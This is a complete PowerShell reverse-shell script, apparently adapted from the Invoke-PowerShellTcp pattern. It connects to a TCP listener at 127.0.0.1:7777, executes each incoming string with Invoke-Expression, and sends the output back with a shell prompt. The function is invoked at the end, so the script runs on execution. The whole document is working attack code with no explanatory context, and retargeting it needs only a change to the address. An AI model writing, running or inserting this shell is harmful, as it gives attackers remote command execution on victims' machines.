function Invoke-PowerShellTcp {
    $IPAddress = '127.0.0.1'
    $Port = 7777
    $client = New-Object System.Net.Sockets.TCPClient($IPAddress, $Port)
    $stream = $client.GetStream()
    [byte[]]$bytes = 0..65535 | % { 0 }

    $sendbytes = ([text.encoding]::ASCII).GetBytes("PS " + (Get-Location).Path + '> ')
    $stream.Write($sendbytes, 0, $sendbytes.Length)

    while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
        $data = ([text.encoding]::ASCII).GetString($bytes, 0, $i)
        $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String)
        $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte, 0, $sendbyte.Length)
        $stream.Flush()
    }

    $client.Close()
}

Invoke-PowerShellTcp
